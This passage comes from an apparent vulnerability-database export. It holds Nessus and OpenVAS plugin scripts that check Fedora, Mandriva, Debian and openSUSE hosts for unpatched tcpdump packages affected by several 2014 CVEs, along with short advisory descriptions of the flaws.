script_bugtraq_id(71150, 71153);\n script_xref(name:\"FEDORA\", value:\"2014-15549\");\n\n script_name(english:\"Fedora 19 : tcpdump-4.4.0-4.fc19 (2014-15549)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Security fix for CVE-2014-8767 CVE-2014-8769\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=1165160\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=1165162\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2014-December/145201.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?4f5c4106\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected tcpdump package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:N/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:ND/RL:OF/RC:ND\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:tcpdump\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:19\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/11/22\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/12/04\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2014-2015 Tenable Network Security, Inc.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^19([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 19.x\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"FC19\", reference:\"tcpdump-4.4.0-4.fc19\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"tcpdump\");\n}\n", "cvss": {"score": 6.4, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:PARTIAL/"}}, {"lastseen": "2019-02-21T01:23:02", "bulletinFamily": "scanner", "description": "Updated tcpdump package fixes security vulnerabilities :\n\nThe Tcpdump program could crash when processing a malformed OLSR payload when the verbose output flag was set (CVE-2014-8767).\n\nThe application decoder for the Ad hoc On-Demand Distance Vector (AODV) protocol in Tcpdump fails to perform input validation and performs unsafe out-of-bound accesses. The application will usually not crash, but perform out-of-bounds accesses and output/leak larger amounts of invalid data, which might lead to dropped packets. It is unknown if a payload exists that might trigger segfaults (CVE-2014-8769).\n\nIt was discovered that tcpdump incorrectly handled printing PPP packets. A remote attacker could use this issue to cause tcpdump to crash, resulting in a denial of service, or possibly execute arbitrary code (CVE-2014-9140).", "modified": "2018-07-19T00:00:00", "id": "MANDRIVA_MDVSA-2014-240.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=79985", "published": "2014-12-15T00:00:00", "title": "Mandriva Linux Security Advisory : tcpdump (MDVSA-2014:240)", "type": "nessus", "sourceData": "#%NASL_MIN_LEVEL 70103\n\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Mandriva Linux Security Advisory MDVSA-2014:240. \n# The text itself is copyright (C) Mandriva S.A.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(79985);\n script_version(\"1.3\");\n script_cvs_date(\"Date: 2018/07/19 20:59:18\");\n\n script_cve_id(\"CVE-2014-8767\", \"CVE-2014-8769\", \"CVE-2014-9140\");\n script_bugtraq_id(71150, 71153, 71468);\n script_xref(name:\"MDVSA\", value:\"2014:240\");\n\n script_name(english:\"Mandriva Linux Security Advisory : tcpdump (MDVSA-2014:240)\");\n script_summary(english:\"Checks rpm output for the updated package\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Mandriva Linux host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Updated tcpdump package fixes security vulnerabilities :\n\nThe Tcpdump program could crash when processing a malformed OLSR\npayload when the verbose output flag was set (CVE-2014-8767).\n\nThe application decoder for the Ad hoc On-Demand Distance Vector\n(AODV) protocol in Tcpdump fails to perform input validation and\nperforms unsafe out-of-bound accesses. The application will usually\nnot crash, but perform out-of-bounds accesses and output/leak larger\namounts of invalid data, which might lead to dropped packets. It is\nunknown if a payload exists that might trigger segfaults\n(CVE-2014-8769).\n\nIt was discovered that tcpdump incorrectly handled printing PPP\npackets. A remote attacker could use this issue to cause tcpdump to\ncrash, resulting in a denial of service, or possibly execute arbitrary\ncode (CVE-2014-9140).\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://advisories.mageia.org/MGASA-2014-0503.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://advisories.mageia.org/MGASA-2014-0511.html\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected tcpdump package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:N/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:ND/RL:OF/RC:ND\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:tcpdump\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:mandriva:business_server:1\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/12/14\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/12/15\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2014-2018 Tenable Network Security, Inc.\");\n script_family(english:\"Mandriva Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/Mandrake/release\", \"Host/Mandrake/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Mandrake/release\")) audit(AUDIT_OS_NOT, \"Mandriva / Mandake Linux\");\nif (!get_kb_item(\"Host/Mandrake/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^(amd64|i[3-6]86|x86_64)$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Mandriva / Mandrake Linux\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"MDK-MBS1\", cpu:\"x86_64\", reference:\"tcpdump-4.2.1-2.2.mbs1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 6.4, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:PARTIAL/"}}, {"lastseen": "2019-02-21T01:22:55", "bulletinFamily": "scanner", "description": "Security fix for CVE-2014-8767 CVE-2014-8768 CVE-2014-8769\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Fedora security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "modified": "2015-10-19T00:00:00", "id": "FEDORA_2014-15541.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=79608", "published": "2014-11-28T00:00:00", "title": "Fedora 20 : tcpdump-4.5.1-2.fc20 (2014-15541)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 2014-15541.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(79608);\n script_version(\"$Revision: 1.2 $\");\n script_cvs_date(\"$Date: 2015/10/19 22:14:43 $\");\n\n script_cve_id(\"CVE-2014-8767\", \"CVE-2014-8768\", \"CVE-2014-8769\");\n script_xref(name:\"FEDORA\", value:\"2014-15541\");\n\n script_name(english:\"Fedora 20 : tcpdump-4.5.1-2.fc20 (2014-15541)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Security fix for CVE-2014-8767 CVE-2014-8768 CVE-2014-8769\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=1165160\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=1165161\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=1165162\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2014-November/144951.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?03e6da40\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected tcpdump package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:N/A:P\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:tcpdump\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:20\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/11/22\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/11/28\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2014-2015 Tenable Network Security, Inc.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^20([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 20.x\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"FC20\", reference:\"tcpdump-4.5.1-2.fc20\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"tcpdump\");\n}\n", "cvss": {"score": 6.4, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:PARTIAL/"}}, {"lastseen": "2019-02-21T01:22:57", "bulletinFamily": "scanner", "description": "Several vulnerabilities have been discovered in tcpdump, a command-line network traffic analyzer. These vulnerabilities might result in denial of service, leaking sensitive information from memory or, potentially, execution of arbitrary code.", "modified": "2018-11-10T00:00:00", "id": "DEBIAN_DSA-3086.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=79697", "published": "2014-12-04T00:00:00", "title": "Debian DSA-3086-1 : tcpdump - security update", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Debian Security Advisory DSA-3086. The text \n# itself is copyright (C) Software in the Public Interest, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(79697);\n script_version(\"1.6\");\n script_cvs_date(\"Date: 2018/11/10 11:49:36\");\n\n script_cve_id(\"CVE-2014-8767\", \"CVE-2014-8769\", \"CVE-2014-9140\");\n script_bugtraq_id(71150, 71153);\n script_xref(name:\"DSA\", value:\"3086\");\n\n script_name(english:\"Debian DSA-3086-1 : tcpdump - security update\");\n script_summary(english:\"Checks dpkg output for the updated package\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Debian host is missing a security-related update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Several vulnerabilities have been discovered in tcpdump, a\ncommand-line network traffic analyzer. These vulnerabilities might\nresult in denial of service, leaking sensitive information from memory\nor, potentially, execution of arbitrary code.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=770424\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=770434\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://packages.debian.org/source/wheezy/tcpdump\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.debian.org/security/2014/dsa-3086\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"Upgrade the tcpdump packages.\n\nFor the stable distribution (wheezy), these problems have been fixed\nin version 4.3.0-1+deb7u1.\n\nFor the upcoming stable distribution (jessie), these problems have\nbeen fixed in version 4.6.2-3.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:N/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:tcpdump\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:7.0\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/12/03\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/12/04\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2014-2018 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Debian Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Debian/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"debian_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Debian/release\")) audit(AUDIT_OS_NOT, \"Debian\");\nif (!get_kb_item(\"Host/Debian/dpkg-l\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (deb_check(release:\"7.0\", prefix:\"tcpdump\", reference:\"4.3.0-1+deb7u1\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:deb_report_get());\n else security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 6.4, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:PARTIAL/"}}, {"lastseen": "2019-02-21T01:23:30", "bulletinFamily": "scanner", "description": "tcpdump was updated to fix three security issues.\n\nThese security issues were fixed :\n\n - CVE-2014-8767: Integer underflow in the olsr_print function in tcpdump 3.9.6 through 4.6.2, when in verbose mode, allowed remote attackers to cause a denial of service (crash) via a crafted length value in an OLSR frame (bnc#905870 905871).\n\n - CVE-2014-8769: tcpdump 3.8 through 4.6.2 might allowed remote attackers to obtain sensitive information from memory or cause a denial of service (packet loss or segmentation fault) via a crafted Ad hoc On-Demand Distance Vector (AODV) packet, which triggers an out-of-bounds memory access (bnc#905871 905872).\n\n - CVE-2014-8768: Multiple Integer underflows in the geonet_print function in tcpdump 4.5.0 through 4.6.2, when in verbose mode, allowed remote attackers to cause a denial of service (segmentation fault and crash) via a crafted length value in a Geonet frame (bnc#905871).", "modified": "2015-03-11T00:00:00", "id": "OPENSUSE-2015-146.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=81371", "published": "2015-02-16T00:00:00", "title": "openSUSE Security Update : tcpdump (openSUSE-2015-146)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update openSUSE-2015-146.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(81371);\n script_version(\"$Revision: 1.2 $\");\n script_cvs_date(\"$Date: 2015/03/11 13:51:32 $\");\n\n script_cve_id(\"CVE-2014-8767\", \"CVE-2014-8768\", \"CVE-2014-8769\");\n\n script_name(english:\"openSUSE Security Update : tcpdump (openSUSE-2015-146)\");\n script_summary(english:\"Check for the openSUSE-2015-146 patch\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote openSUSE host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"tcpdump was updated to fix three security issues.\n\nThese security issues were fixed :\n\n - CVE-2014-8767: Integer underflow in the olsr_print\n function in tcpdump 3.9.6 through 4.6.2, when in verbose\n mode, allowed remote attackers to cause a denial of\n service (crash) via a crafted length value in an OLSR\n frame (bnc#905870 905871).\n\n - CVE-2014-8769: tcpdump 3.8 through 4.6.2 might allowed\n remote attackers to obtain sensitive information from\n memory or cause a denial of service (packet loss or\n segmentation fault) via a crafted Ad hoc On-Demand\n Distance Vector (AODV) packet, which triggers an\n out-of-bounds memory access (bnc#905871 905872).\n\n - CVE-2014-8768: Multiple Integer underflows in the\n geonet_print function in tcpdump 4.5.0 through 4.6.2,\n when in verbose mode, allowed remote attackers to cause\n a denial of service (segmentation fault and crash) via a\n crafted length value in a Geonet frame (bnc#905871).\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=905870\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=905871\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=905872\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected tcpdump packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:N/A:P\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:tcpdump\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:tcpdump-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:tcpdump-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:13.1\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:13.2\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/02/06\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/02/16\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2015 Tenable Network Security, Inc.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE13\\.1|SUSE13\\.2)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"13.1 / 13.2\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nourarch = get_kb_item(\"Host/cpu\");\nif (!ourarch) audit(AUDIT_UNKNOWN_ARCH);\nif (ourarch !~ \"^(i586|i686|x86_64)$\") audit(AUDIT_ARCH_NOT, \"i586 / i686 / x86_64\", ourarch);\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE13.1\", reference:\"tcpdump-4.4.0-2.4.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"tcpdump-debuginfo-4.4.0-2.4.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"tcpdump-debugsource-4.4.0-2.4.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"tcpdump-4.6.2-4.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"tcpdump-debuginfo-4.6.2-4.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"tcpdump-debugsource-4.6.2-4.1\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"tcpdump / tcpdump-debuginfo / tcpdump-debugsource\");\n}\n", "cvss": {"score": 6.4, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:PARTIAL/"}}], "openvas": [{"lastseen": "2018-09-01T23:54:55", "bulletinFamily": "scanner", "description": "Check the version of tcpdump", "modified": "2017-07-12T00:00:00", "published": "2014-12-05T00:00:00", "id": "OPENVAS:1361412562310868548", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310868548", "title": "Fedora Update for tcpdump FEDORA-2014-15549", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for tcpdump FEDORA-2014-15549\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2014 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.868548\");\n script_version(\"$Revision: 6692 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-12 11:57:43 +0200 (Wed, 12 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2014-12-05 05:19:41 +0100 (Fri, 05 Dec 2014)\");\n script_cve_id(\"CVE-2014-8767\", \"CVE-2014-8769\");\n script_tag(name:\"cvss_base\", value:\"6.4\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:N/A:P\");\n script_name(\"Fedora Update for tcpdump FEDORA-2014-15549\");\n script_tag(name: \"summary\", value: \"Check the version of tcpdump\");\n script_tag(name: \"vuldetect\", value: \"Get the installed version with the help of detect NVT and check if the version is vulnerable or not.\");\n script_tag(name: \"insight\", value: \"Tcpdump is a command-line tool for monitoring network traffic.\nTcpdump can capture and display the packet headers on a particular\nnetwork interface or on all interfaces. Tcpdump can display all of\nthe packet headers, or just the ones that match particular criteria.\n\nInstall tcpdump if you need a program to monitor network traffic.\n\");\n script_tag(name: \"affected\", value: \"tcpdump on Fedora 19\");\n script_tag(name: \"solution\", value: \"Please Install the Updated Packages.\");\n script_xref(name: \"FEDORA\", value: \"2014-15549\");\n script_xref(name: \"URL\" , value: \"https://lists.fedoraproject.org/pipermail/package-announce/2014-December/145201.html\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2014 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\");\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"FC19\")\n{\n\n if ((res = isrpmvuln(pkg:\"tcpdump\", rpm:\"tcpdump~4.4.0~4.fc19\", rls:\"FC19\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}", "cvss": {"score": 6.4, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:PARTIAL/"}}, {"lastseen": "2018-09-01T23:52:22", "bulletinFamily": "scanner", "description": "Check the version of tcpdump", "modified": "2017-07-10T00:00:00", "published": "2015-01-05T00:00:00", "id": "OPENVAS:1361412562310868783", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310868783", "title": "Fedora Update for tcpdump FEDORA-2014-15609", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for tcpdump FEDORA-2014-15609\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2015 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.868783\");\n script_version(\"$Revision: 6630 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-10 08:34:32 +0200 (Mon, 10 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2015-01-05 14:51:40 +0100 (Mon, 05 Jan 2015)\");\n script_cve_id(\"CVE-2014-8767\", 